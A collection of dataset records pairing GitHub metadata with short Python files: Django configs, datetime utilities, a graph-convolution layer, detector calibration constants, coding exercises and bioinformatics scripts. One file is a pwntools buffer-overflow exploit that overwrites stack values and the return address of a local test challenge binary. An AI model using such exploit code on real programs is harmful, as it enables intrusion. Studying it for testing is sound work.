"zer0i3@aliyun.com"
] | zer0i3@aliyun.com |
75200e6184bed8483c342fedcef21aba6ab696c7 | 92957173706467d31f9ad3cb4343f384312b7248 | /arkestra_image_plugin/testrunner.py | d63e009477a28766ba13a77be0df4f87609a1870 | [
"BSD-2-Clause"
] | permissive | evildmp/Arkestra | edc010f8726efe928ac453edf252705845ca98d6 | 3e7f7d8e109221180866fe482c70a94e635fd594 | refs/heads/develop | 2020-04-06T04:22:15.003712 | 2016-02-11T15:20:02 | 2016-02-11T15:20:02 | 1,449,804 | 57 | 12 | null | 2016-02-12T23:05:26 | 2011-03-07T11:49:47 | Python | UTF-8 | Python | false | false | 153 | py | from django.conf import settings
settings.configure(DEBUG=True, TEMPLATE_DEBUG=True,
TEMPLATE_DIRS=('/home/web-apps/myapp', '/home/web-apps/base'))
| [
"daniele@vurt.org"
] | daniele@vurt.org |
b9b6d67a147122f5ac8f755cafbe94b22c1e4345 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/2D_20200722172559.py | 5059d62102aea6cdd5f5ee56dd0183f19e3c1566 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | def array(n,m):
# where n is row size and m is column size
array = [[0 for x in range(n)] for x in range(m)]
print(array)
a = [[2, 4, 6, 8, 10], [3, 6, 9, 12, 15], [4, 8, 12, 16, 20]]
# where the first arguement reps the row and second arguement reps the column
print(a[0][3])
def hourGlass(arr):
# you have a 2d array
# get max hour glass
# var maxCount to keep record of the max count
# what do you know about an hourglass
# the indicies fall in a pattern where
# i and i+2 are not equal to 0 and i + 1 is equal to 0
maxCount = 1
if arr !=[]:
for i in range(len(arr)):
for j in range(len(arr[i])):
if arr[i][j] > 0:
count +=1
print(arr[i][j])
else:
return 0
hourGlass([[1,1,1,0,0,0],[0,1,0,0,0,0],[1,1,1,0,0,0],[0,0,2,4,4],[0,0,0,2,0,0],[0,0,1,2,4,0]]) | [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
96ff4a5ce8802d24066c55849c077829a026bb6e | c831e7f6c434900d817f59a11b25e78a1a5090ad | /Calibration/CalibConfigFiles/Archive/CalibConfig_DetModel72_RecoStage72.py | 568126e57adc41e8c060c5df4ce930df853fb3dc | [] | no_license | StevenGreen1/OptimisationStudies | 8cca03f57d2cbf81e5fb609f13e2fa4b9c9880f6 | c5741e8d2fab4752ceca8b10cc5f2bbc1a7fafa9 | refs/heads/master | 2021-01-18T21:30:51.418785 | 2017-02-21T16:27:50 | 2017-02-21T16:27:50 | 44,306,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,262 | py | # Calibration config file for testing
# Digitisation Constants - ECal
CalibrECal = 42.4705823941
# Digitisation Constants ILDCaloDigi - HCal
CalibrHCalBarrel = 48.7023928526
CalibrHCalEndcap = 55.5809128718
CalibrHCalOther = 29.7879819428
# Digitisation Constants NewLDCCaloDigi - HCal
CalibrHCal = -1
# Digitisation Constants - Muon Chamber
CalibrMuon = 56.7
# MIP Peak position in directed corrected SimCaloHit energy distributions
# used for realistic ECal and HCal digitisation options
CalibrECalMIP = 0.0001525
CalibrHCalMIP = 0.0004975
# MIP Peak position in directed corrected CaloHit energy distributions
# used for MIP definition in PandoraPFA
ECalToMIPCalibration = 153.846
HCalToMIPCalibration = 38.0228
MuonToMIPCalibration = 10.101
# EM and Had Scale Settings
ECalToEMGeVCalibration = 1.00423799486
HCalToEMGeVCalibration = 1.07513143288
ECalToHadGeVCalibration = 1.16555482522
HCalToHadGeVCalibration = 1.07513143288
# Pandora Threshold Cuts
ECalMIPThresholdPandora = 0.5
HCalMIPThresholdPandora = 0.3
# Hadronic Energy Truncation in HCal PandoraPFA
MaxHCalHitHadronicEnergy = 1.5
# Timing ECal
ECalBarrelTimeWindowMax = 100.0
ECalEndcapTimeWindowMax = 100.0
# Timing HCal
HCalBarrelTimeWindowMax = 100.0
HCalEndcapTimeWindowMax = 100.0
| [
"sg1sg2sg3@hotmail.co.uk"
] | sg1sg2sg3@hotmail.co.uk |
7573037e49e0216374763e873ff5b9b066a40b3f | c2d56799fcd048470769114301f4d834de6eaa5a | /blog/migrations/0002_auto_20170419_1834.py | 661d531ea47ff2f1e2a2749b7be43f82da6b69f0 | [] | no_license | talenhao/django_girls_study | 580d900a596850753dbebcd57b19be473cf05aba | 14c9680aec8619971a6899fd11fa3f6372355809 | refs/heads/master | 2021-01-19T22:24:23.429662 | 2017-04-25T04:25:46 | 2017-04-25T04:25:46 | 88,810,670 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='post',
name='created_date',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
| [
"talenhao@gmail.com"
] | talenhao@gmail.com |
9c486ba49768093c2ecd81be7540f65170248aa5 | f6189ae8031fcf756cd892ed866cb937bf0e5d56 | /datetime_utils/basic_utils.py | fbfa6703b86fbd2d028bc7ecbe483de0ae1bb85c | [] | no_license | shadhini/python_helpers | f9265ee139a9e32528b257ae1adee731d0d08d3f | d8a74fb22e6da741d9442325661b042c8c26202a | refs/heads/master | 2021-07-05T15:07:02.294986 | 2020-10-28T03:37:01 | 2020-10-28T03:37:01 | 198,464,862 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,257 | py | from datetime import datetime, timedelta
import math
COMMON_DATE_TIME_FORMAT = "%Y-%m-%d %H:%M:%S"
def now_as_string(string_format=None):
if string_format is None:
return datetime.now().strftime(COMMON_DATE_TIME_FORMAT)
else:
return datetime.now().strftime(string_format)
def now_as_datetime(format=None):
if format is None:
return datetime.now()
else:
return datetime.strptime(datetime.now().strftime(format), format)
def datetime_to_str(datetime_value, string_format=None):
if format is None:
return datetime_value.strftime(COMMON_DATE_TIME_FORMAT)
else:
return datetime_value.strftime(string_format)
def str_to_datetime(datetime_string, format=None):
if format is None:
datetime.strptime(datetime_string, COMMON_DATE_TIME_FORMAT)
else:
datetime.strptime(datetime_string, format)
def round_to_nearest_hour(datetime_string, format=None):
if format is None:
time = datetime.strptime(datetime_string, COMMON_DATE_TIME_FORMAT)
else:
time = datetime.strptime(datetime_string, format)
if time.minute > 30:
return (time + timedelta(hours=1)).strftime("%Y-%m-%d %H:00:00")
return time.strftime("%Y-%m-%d %H:00:00")
def round_to_nearest_half_hour(datetime_string, format=None):
if format is None:
time = datetime.strptime(datetime_string, COMMON_DATE_TIME_FORMAT)
else:
time = datetime.strptime(datetime_string, format)
if time.minute <= 15:
return time.strftime("%Y-%m-%d %H:00:00")
elif (time.minute > 15) and (time.minute < 45):
return time.strftime("%Y-%m-%d %H:30:00")
return (time + timedelta(hours=1)).strftime("%Y-%m-%d %H:00:00")
def round_to_nearest_x_minutes(datetime_string, mins, format=None):
if format is None:
time = datetime.strptime(datetime_string, COMMON_DATE_TIME_FORMAT)
format = COMMON_DATE_TIME_FORMAT
else:
time = datetime.strptime(datetime_string, format)
base_time = datetime.strptime(time.strftime("%Y-%m-%d %H:00:00"), format)
multiplier = round(time.minute / mins)
return (base_time + timedelta(minutes=mins*multiplier)).strftime(format)
def round_up_datetime_to_nearest_x_minutes(datetime_value, mins):
base_time = datetime_value.replace(minute=0, second=0, microsecond=0)
multiplier = math.ceil(datetime_value.minute / mins)
return base_time + timedelta(minutes=mins*multiplier)
def round_down_datetime_to_nearest_x_minutes(datetime_value, mins):
base_time = datetime_value.replace(minute=0, second=0, microsecond=0)
multiplier = math.floor(datetime_value.minute / mins)
return base_time + timedelta(minutes=mins*multiplier)
# print(round_to_nearest_hour("2019-08-30 08:15:00"))
# print(round_to_nearest_half_hour("2019-08-30 23:58:00"))
# print(round_to_nearest_x_minutes("2019-08-30 08:16:00", 15))
# print(type(datetime.now()))
#
# time = datetime.strptime("2019-10-05 23:45:00", COMMON_DATE_TIME_FORMAT)
#
# print(round_up_datetime_to_nearest_x_minutes(time, 15))
# print(round_down_datetime_to_nearest_x_minutes(time, 15))
### UTC time
def get_SL_time_now():
return (datetime.utcnow() + timedelta(hours=5, minutes=30))
| [
"jshadhiniaseka@gmail.com"
] | jshadhiniaseka@gmail.com |
4a0652c78a692e7cda3b603546fa6bc28af17c34 | ef821468b081ef2a0b81bf08596a2c81e1c1ef1a | /Python Advanced/Tuples_and_Sets-Exercises/Periodic Table.py | e5ee6900c871b0256e37d4a4dfc9c36a0c190b7c | [] | no_license | Ivaylo-Atanasov93/The-Learning-Process | 71db22cd79f6d961b9852f140f4285ef7820dd80 | 354844e2c686335345f6a54b3af86b78541ed3f3 | refs/heads/master | 2023-03-30T20:59:34.304207 | 2021-03-29T15:23:05 | 2021-03-29T15:23:05 | 294,181,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | number = int(input())
unique_elements = set()
for i in range(number):
elements = input().split()
[unique_elements.add(element) for element in elements]
[print(element) for element in unique_elements]
| [
"ivailo.atanasov93@gmail.com"
] | ivailo.atanasov93@gmail.com |
d58ea80b3ae30f51247d56d865f826bcdbc7c2b0 | 12dd41cf81462d7e49de43202e5d3ee5a389ac69 | /app/lib/package_control/deps/oscrypto/version.py | c6494d5296b17f346a56b71abc297fd8b73368cf | [
"MIT"
] | permissive | rchl/packagecontrol.io | 02d39c70b63682697767287be6d4d2c5b851ace2 | d6acf2e0122def669aa2d38b5747a7c218516694 | refs/heads/master | 2021-03-15T08:31:18.443232 | 2020-01-22T14:38:59 | 2020-01-22T14:38:59 | 246,837,467 | 0 | 0 | NOASSERTION | 2020-03-12T13:10:40 | 2020-03-12T13:10:39 | null | UTF-8 | Python | false | false | 165 | py | # coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
__version__ = '1.2.0.dev1'
__version_info__ = (1, 2, 0, 'dev1')
| [
"will@wbond.net"
] | will@wbond.net |
26e98a8ba473fc7b12f71ed3389bf3bf1d05e2c9 | c4869d75f28507f6b37b04ca4f8d556f1900d5de | /yunda/yunda_spider/query_goods/yunda_conf.py | 1c82eece2cbd0b764b6d40c8dd9e6f42087f666f | [] | no_license | incinya/sklearn_img | 747a24c07e253f83c09039755d5fa00a2ae7ac9f | c8b85f82a2fc270904494afc9886161b39024976 | refs/heads/master | 2022-12-24T03:01:36.129859 | 2020-08-05T08:22:57 | 2020-08-05T08:22:57 | 263,810,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | url = "http://ykjcx.yundasys.com/go.php"
url2 = "http://ykjcx.yundasys.com/go_wsd.php"
url3 = "http://ykjcx.yundasys.com/zb1qBpg2.php"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36",
"Cookie": "PHPSESSID=0loq49ujoml8svcd9p7ur37qq5; JSESSIONID=qMbGpgsYdvLbpk1tGQ8nsNknnB6gwTJmWqLJMxTdbSspMQJSXqvN!-933856493",
}
filename = '002.png'
| [
"283438692@qq.com"
] | 283438692@qq.com |
d1a03b2a8a6ad4af3b7e287061ce0af9e2c9b846 | bde6ed092b7b29703737e11c5a5ff90934af3d74 | /AtCoder/ABC/119/c.py | ab6ab58c8b33c11706d228a8564b2fc9050bf892 | [] | no_license | takecian/ProgrammingStudyLog | 2ab7ea601e0996b3fa502b81ec141bc3772442b6 | 94485d131c0cc9842f1f4799da2d861dbf09b12a | refs/heads/master | 2023-04-28T16:56:18.943574 | 2023-04-18T06:34:58 | 2023-04-18T06:34:58 | 128,525,713 | 4 | 0 | null | 2022-12-09T06:15:19 | 2018-04-07T12:21:29 | Python | UTF-8 | Python | false | false | 1,547 | py | # https://atcoder.jp/contests/abc119/tasks/abc119_c
import copy
import itertools
# 長さ t の竹を L から少ないコストで作る方法を探す
def solve(t, l, c):
min_cost = 100000
cand = []
# 全組み合わせを考えて一番コストの低いものを使う
ptn = 1 << len(l) # Bit 全探索
for i in range(1, ptn):
answers = []
for j in range(0, len(l)):
if (i >> j) & 1:
answers.append(l[j])
temp_cost = abs(t - sum(answers)) + (10 * (len(answers) - 1) if len(answers) > 1 else 0)
if temp_cost < min_cost:
min_cost = temp_cost
cand = answers
# print("cand = {}".format(cand))
for d in cand:
del l[l.index(d)]
return min_cost, l
def main():
N, A, B, C = map(int, input().split())
L = [int(input()) for _ in range(N)]
L.sort()
answer = 1000000
for targets in itertools.permutations([A, B, C]):
is_done = [False] * 3
L2 = copy.copy(L)
total_cost = 0
# 同じ長さの竹があったら使う
for i in range(len(targets)):
if targets[i] in L2:
del L2[L2.index(targets[i])]
is_done[i] = True
# 同じ長さの竹がない場合
for i in range(3):
if is_done[i]:
continue
cost, L2 = solve(targets[i], L2, 0)
total_cost += cost
answer = min(answer, total_cost)
print(answer)
if __name__ == '__main__':
main()
| [
"takecian@gmail.com"
] | takecian@gmail.com |
8f274a48f43e048c77afdc94cf23e0d85d5ea79d | 2a8068c87a082e0c12583aceeba7ec4e56968c88 | /src/synbio/ligate_singlefasta_with_vector_gui.py | 3ebea6754723b87b37d3a0340537d2d9f7ef08c1 | [
"MIT"
] | permissive | olgatsiouri1996/bioinfo_gui_scripts | 02feeefc2d94a006a15d3ae569ddaabb3ae23414 | 01056fd4188f459b293eb7bd19aea30c58ec0487 | refs/heads/master | 2023-08-18T09:41:46.371644 | 2023-08-14T12:24:18 | 2023-08-14T12:24:18 | 297,280,118 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,675 | py | # python3
import os
from gooey import *
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio import SeqFeature
# imput parameters
@Gooey(required_cols=2, program_name='ligate single-fasta files with vector', header_bg_color= '#DCDCDC', terminal_font_color= '#DCDCDC', terminal_panel_color= '#DCDCDC')
def main():
ap = GooeyParser(description="ligate vector with inserts in single-fasta files")
ap.add_argument("-vr", "--vector", required=True, widget='FileChooser', help="vector in genbank format")
ap.add_argument("-dir", "--directory", required=True, type=str, widget='DirChooser', help="directory to search for fasta files")
args = vars(ap.parse_args())
# main
# linear vector
plasmid = SeqIO.read(args['vector'], "genbank")
x = str(plasmid.seq)
# retrieve the name of the input file
file = os.path.split(args['vector'])[1]
# DNA insert
# import each fasta file from the working directory
for filename in sorted(os.listdir(os.chdir(args['directory']))):
if filename.endswith(".fa") or filename.endswith(".fasta"):
record = SeqIO.read(filename, "fasta")
y = str(record.seq)
# merge
seqad = x + y
# add this record to the list
ligated = SeqRecord(Seq(seqad),id='_'.join([record.id,file.split(".")[0]]),description="",annotations={"molecule_type":"DNA","topology":"circular"})
ligated.features = plasmid.features
# export to genbank
SeqIO.write(ligated,"".join([filename.split(".")[0],"_",file.split(".")[0],".gb"]), "genbank")
if __name__ == '__main__':
main()
| [
"olgatsiouri@outlook.com"
] | olgatsiouri@outlook.com |
4ba4f8795a7eb913615680ccd1eb99603d09a8f7 | 8f4d7da050401865af3cd3341adb323062ae6447 | /count_smaller.py | 6dde4180293087884aced94ef57774c67470a776 | [] | no_license | ankitomss/python_practice | e68c2446f173018c093187b9e5ba31f21f994eac | f46ab3bcafbca4d0209df3aa9114dad52bda76b2 | refs/heads/master | 2021-01-11T05:15:15.369203 | 2016-10-13T03:00:58 | 2016-10-13T03:00:58 | 69,192,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | def findindex(sort, x):
s, e = 0, len(sort)-1
if x < sort[s]: return s
if x > sort[e]: return e+1
while s<=e:
m = (s+e)/2
if s==e:
return s if x <= sort[s] else s+1
elif sort[m] == x:
while sort[m] == x:
m -= 1
return m+1
elif sort[m] < x:
s = m+1
elif sort[m] > x:
e = m-1
return s
def count_smaller(nums):
n = len(nums)
sort = [nums[n-1]]
ans = [0] * n
for i in range(n-2, -1, -1):
index = findindex(sort, nums[i])
print sort, index
sort.insert(index, nums[i])
ans[i] = index
return ans
nums = [5, 2, 6,2,2, 3]
print count_smaller(nums) | [
"v.ankit001@gmail.com"
] | v.ankit001@gmail.com |
126f82ce2f0b2053d004967d70746126610dc429 | 622a93a85402cd6d4e0c477dfd5c9370e9d918b9 | /torch_geometric/nn/conv/nn_conv.py | a9745fcf22ff93854280127711ccb58f65a9137c | [
"MIT"
] | permissive | YuGuangWang/pytorch_geometric | 1bfe88366ee661bc91d2909400e568e157796bfb | 44ce5378e71b8fa4adefb6baa1f597a30b48ba5f | refs/heads/master | 2021-11-21T12:31:53.659731 | 2021-08-24T11:21:48 | 2021-08-24T11:21:48 | 202,147,128 | 0 | 0 | MIT | 2020-01-16T07:29:44 | 2019-08-13T13:09:08 | Python | UTF-8 | Python | false | false | 4,329 | py | from typing import Union, Tuple, Callable
from torch_geometric.typing import OptTensor, OptPairTensor, Adj, Size
import torch
from torch import Tensor
from torch.nn import Parameter
from torch_geometric.nn.conv import MessagePassing
from ..inits import reset, uniform, zeros
class NNConv(MessagePassing):
r"""The continuous kernel-based convolutional operator from the
`"Neural Message Passing for Quantum Chemistry"
<https://arxiv.org/abs/1704.01212>`_ paper.
This convolution is also known as the edge-conditioned convolution from the
`"Dynamic Edge-Conditioned Filters in Convolutional Neural Networks on
Graphs" <https://arxiv.org/abs/1704.02901>`_ paper (see
:class:`torch_geometric.nn.conv.ECConv` for an alias):
.. math::
\mathbf{x}^{\prime}_i = \mathbf{\Theta} \mathbf{x}_i +
\sum_{j \in \mathcal{N}(i)} \mathbf{x}_j \cdot
h_{\mathbf{\Theta}}(\mathbf{e}_{i,j}),
where :math:`h_{\mathbf{\Theta}}` denotes a neural network, *.i.e.*
a MLP.
Args:
in_channels (int or tuple): Size of each input sample. A tuple
corresponds to the sizes of source and target dimensionalities.
out_channels (int): Size of each output sample.
nn (torch.nn.Module): A neural network :math:`h_{\mathbf{\Theta}}` that
maps edge features :obj:`edge_attr` of shape :obj:`[-1,
num_edge_features]` to shape
:obj:`[-1, in_channels * out_channels]`, *e.g.*, defined by
:class:`torch.nn.Sequential`.
aggr (string, optional): The aggregation scheme to use
(:obj:`"add"`, :obj:`"mean"`, :obj:`"max"`).
(default: :obj:`"add"`)
root_weight (bool, optional): If set to :obj:`False`, the layer will
not add the transformed root node features to the output.
(default: :obj:`True`)
bias (bool, optional): If set to :obj:`False`, the layer will not learn
an additive bias. (default: :obj:`True`)
**kwargs (optional): Additional arguments of
:class:`torch_geometric.nn.conv.MessagePassing`.
"""
def __init__(self, in_channels: Union[int, Tuple[int, int]],
out_channels: int, nn: Callable, aggr: str = 'add',
root_weight: bool = True, bias: bool = True, **kwargs):
super(NNConv, self).__init__(aggr=aggr, **kwargs)
self.in_channels = in_channels
self.out_channels = out_channels
self.nn = nn
self.aggr = aggr
if isinstance(in_channels, int):
in_channels = (in_channels, in_channels)
self.in_channels_l = in_channels[0]
if root_weight:
self.root = Parameter(torch.Tensor(in_channels[1], out_channels))
else:
self.register_parameter('root', None)
if bias:
self.bias = Parameter(torch.Tensor(out_channels))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
reset(self.nn)
if self.root is not None:
uniform(self.root.size(0), self.root)
zeros(self.bias)
def forward(self, x: Union[Tensor, OptPairTensor], edge_index: Adj,
edge_attr: OptTensor = None, size: Size = None) -> Tensor:
""""""
if isinstance(x, Tensor):
x: OptPairTensor = (x, x)
# propagate_type: (x: OptPairTensor, edge_attr: OptTensor)
out = self.propagate(edge_index, x=x, edge_attr=edge_attr, size=size)
x_r = x[1]
if x_r is not None and self.root is not None:
out += torch.matmul(x_r, self.root)
if self.bias is not None:
out += self.bias
return out
def message(self, x_j: Tensor, edge_attr: Tensor) -> Tensor:
weight = self.nn(edge_attr)
weight = weight.view(-1, self.in_channels_l, self.out_channels)
return torch.matmul(x_j.unsqueeze(1), weight).squeeze(1)
def __repr__(self):
return '{}({}, {}, aggr="{}", nn={})'.format(self.__class__.__name__,
self.in_channels,
self.out_channels,
self.aggr, self.nn)
ECConv = NNConv
| [
"matthias.fey@tu-dortmund.de"
] | matthias.fey@tu-dortmund.de |
dba3da1a114dfe1aa55bffeefb45f64e348b7f33 | 1834d070640596ad1b96fbfeb92168be078753ee | /web_flask/9-states.py | 723fc16fbf6287fff9052df6b2fa750b40ab2e2d | [] | no_license | EtienneBrJ/AirBnB_clone_v2 | c8cc34064b19ccea950c343ecff96424946cf942 | b4b9c3339a7b7e2e24f2a7e0d35cc65407a30ee6 | refs/heads/master | 2023-08-15T01:06:10.489905 | 2021-09-21T18:21:13 | 2021-09-21T18:21:13 | 393,375,203 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,115 | py | #!/usr/bin/python3
"""Starts a Flask web application.
The application listens on 0.0.0.0, port 5000.
Routes:
/states: HTML page with a list of all State objects.
/states/<id>: HTML page displaying the given state with <id>.
"""
from models import storage
from models.state import State
from flask import Flask
from flask import render_template
app = Flask(__name__)
@app.route("/states", strict_slashes=False)
def states():
"""Displays an HTML page with a list of all States.
States are sorted by name.
"""
states = storage.all("State")
return render_template("9-states.html", state=states)
@app.route("/states/<id>", strict_slashes=False)
def states_id(id):
"""Displays an HTML page with info about <id>, if it exists."""
for state in storage.all("State").values():
if state.id == id:
return render_template("9-states.html", state=state)
return render_template("9-states.html")
@app.teardown_appcontext
def teardown(exc):
"""Remove the current SQLAlchemy session."""
storage.close()
if __name__ == "__main__":
app.run(host="0.0.0.0")
| [
"etiennebrxv@gmail.com"
] | etiennebrxv@gmail.com |
f75c9d8254829452892249b7c92e561212cfe494 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /00_BofVar-unit-tests/05_64/remenissions-work/exploit-BofFunc-6.py | fcbd195258ee74db0902705c26c4042d6c3f5b85 | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | from pwn import *
import time
import sys
import signal
import sf
target = process("./chall-test_BofVar-05-x64")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=64)
bof_payload.set_input_start(0x58)
bof_payload.add_int32(0x20, 0xdeab)
bof_payload.add_int32(0x1c, 0xbef1)
bof_payload.add_int32(0x18, 0xfacadf)
bof_payload.add_int32(0x14, 0xbeef)
bof_payload.add_int32(0x10, 0xfacadf)
bof_payload.add_int32(0xc, 0xdeac)
bof_payload.set_ret(0x400537)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
def check_verification_done():
while True:
if os.path.exists("pwned") or os.path.exists("rip"):
sys.exit(0)
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
check_verification_done()
except Exception:
print("Exploit timed out")
| [
"ryancmeinke@gmail.com"
] | ryancmeinke@gmail.com |
4fc21a018f8acd4f1139eef64dbbd8155544d2d6 | 5db4e48731162a8a3fc5a6996ace94fb0e692e67 | /packages/registry/setup.py | 6c826670e69f58b49b2ec932f22d4bb4faa5afa1 | [
"Apache-2.0"
] | permissive | 0mars/monoskel | 89026f50179d47b455f3ed2062d8d5eeb53c7c7c | 1755f3c047d56b5cfe8e9b36b77c1e155bbd5a51 | refs/heads/master | 2022-12-13T18:59:56.232663 | 2020-12-26T09:22:47 | 2020-12-26T09:22:47 | 202,740,303 | 2 | 1 | Apache-2.0 | 2022-12-08T07:45:54 | 2019-08-16T14:18:07 | Python | UTF-8 | Python | false | false | 1,385 | py | from os.path import abspath, dirname, join as pjoin
from setuptools import setup, find_packages
root = dirname(abspath(__file__))
def execfile(fname, globs, locs=None):
locs = locs or globs
exec(compile(open(fname).read(), fname, "exec"), globs, locs)
source_path = 'src'
packages = find_packages(source_path)
root_packages = [
package
for package in packages
if "." not in package
]
assert len(root_packages) == 1
package = root_packages[0]
package_directory = pjoin(root, source_path, package)
def get_variable_from_file(filepath, variable):
filepath_in_package = pjoin(package_directory, filepath)
globs = {}
execfile(filepath_in_package, globs)
variable_value = globs[variable]
return variable_value
version = get_variable_from_file('_version.py', '__version__')
setup(
name=package,
version=version,
python_requires='>=3.6',
description='',
classifiers=[
'Development Status :: Stable',
'License :: OSI Approved :: General Public License v3 or later (AGPLv3+)',
'Programming Language :: Python :: 3.7',
'Intended Audience :: Developers'
],
packages=packages,
package_dir={'': source_path},
include_package_data=True,
package_data={package: []},
license='AGPL-3.0-or-later',
extras_require={
'test': [
'pytest'
]
}
)
| [
"omars@php.net"
] | omars@php.net |
be1d8368cd3341d801cb37602eb29889e335ae8d | f642c054451aa3c87bb18fa63037eea0e6358bda | /geektrust/loan_payments/customer_manager/models.py | dd3d0fcba64b05726d057e2eaccfe8378e3e3068 | [] | no_license | devendraprasad1984/python | 30f3a539e92be13d893246ad28a42907457a38d5 | 0f1badabba07fbe7f5f792b7e543c0748eecd6c7 | refs/heads/master | 2023-07-21T08:22:45.193077 | 2021-08-27T15:09:28 | 2021-08-27T15:09:28 | 254,812,552 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | from django.db import models
# Create your models here.
class CUSTOMERS(models.Model):
id = models.AutoField(auto_created=True, primary_key=True)
name = models.CharField(max_length=200, null=True)
uid = models.CharField(max_length=30, null=True, unique=True)
age = models.IntegerField()
email = models.EmailField(null=True)
loan_limit = models.DecimalField(max_digits=10, decimal_places=2)
when = models.DateTimeField(auto_now_add=True, blank=True)
| [
"devendraprasad1984@gmail.com"
] | devendraprasad1984@gmail.com |
3bc92ac198515b5ea4965ab5ada7b4cb625936bf | fc13edeb7ffb6ed9bf8e953fa08f97e5d2346316 | /src/manage.py | 8b7a2e00c6553673e8032e4f2d79e06488161725 | [
"BSD-3-Clause"
] | permissive | tykling/sslscout | 8105e61fe37337986ad9e4ba13180435d8a57d25 | c07395faf8b85c535b41d355934161e0b43e4c04 | refs/heads/master | 2021-01-16T20:31:33.028501 | 2014-06-26T05:50:37 | 2014-06-26T05:50:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | #!/usr/local/bin/python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sslscout.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"thomas@gibfest.dk"
] | thomas@gibfest.dk |
c1df8a31f6ab9b5ed0f4f1b3670141d3a8a33983 | 8583b2be92327b21af50237c7c71607f0bdb7be8 | /section07/lecture083/lesson.py | 069bf3d264888ab697fd8cc5557e6cb7fe588c24 | [] | no_license | DIT-Python/Python3_Basic_to_Advance_SV | 654061aa3e151146e78a0e8ac26366dcf62758be | fb6bc230a42cbaf08337cb2f11a2bbeaee6bc2e3 | refs/heads/master | 2022-01-10T16:59:01.725413 | 2019-05-05T10:51:55 | 2019-05-05T10:51:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 888 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
class Car(object):
def __init__(self, model=None):
self.model = model
def run(self):
print('run')
class ToyotaCar(Car):
def run(self):
print('first run')
class TeslaCar(Car):
def __init__(self, model='Model s', enable_auto_run=False):
super().__init__(model)
self._enable_auto_run = enable_auto_run
@property
def enable_auto_run(self):
return self._enable_auto_run
# @enable_auto_run.setter
# def enable_auto_run(self, is_enable):
# self._enable_auto_run = is_enable
def run(self):
print('super run')
def auto_run(self):
print('auto run')
# toyota_car = ToyotaCar('Lexus')
# print(toyota_car.model)
# toyota_car.run()
tesla_car = TeslaCar('Model s')
tesla_car.enable_auto_run = True
print(tesla_car.enable_auto_run)
| [
"takuya.stdmailbox#gmail.com"
] | takuya.stdmailbox#gmail.com |
915ec1588a27b8009f790f24aa7ea2cc31e70c29 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02760/s311421606.py | a93b2cc600572cd086910cf1b5f673e2ae71626b | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | a = [list(map(int, input().split())) for i in range(3)]
n =int(input())
for k in range(n):
b = int(input())
for i in range(3):
for j in range(3):
if a[i][j] == b:
a[i][j] = 0
row0 = a[0] == [0, 0, 0]
row1 = a[1] == [0, 0, 0]
row2 = a[2] == [0, 0, 0]
colum0 = [a[0][0], a[1][0], a[2][0]] == [0, 0, 0]
colum1 = [a[0][1], a[1][1], a[2][1]] == [0, 0, 0]
colum2 = [a[0][2], a[1][2], a[2][2]] == [0, 0, 0]
diag0 = [a[0][0], a[1][1], a[2][2]] == [0, 0, 0]
diag1 = [a[2][0], a[1][1], a[0][2]] == [0, 0, 0]
if row0 or row1 or row2 or colum0 or colum1 or colum2 or diag0 or diag1:
print('Yes')
break
else:
print('No') | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
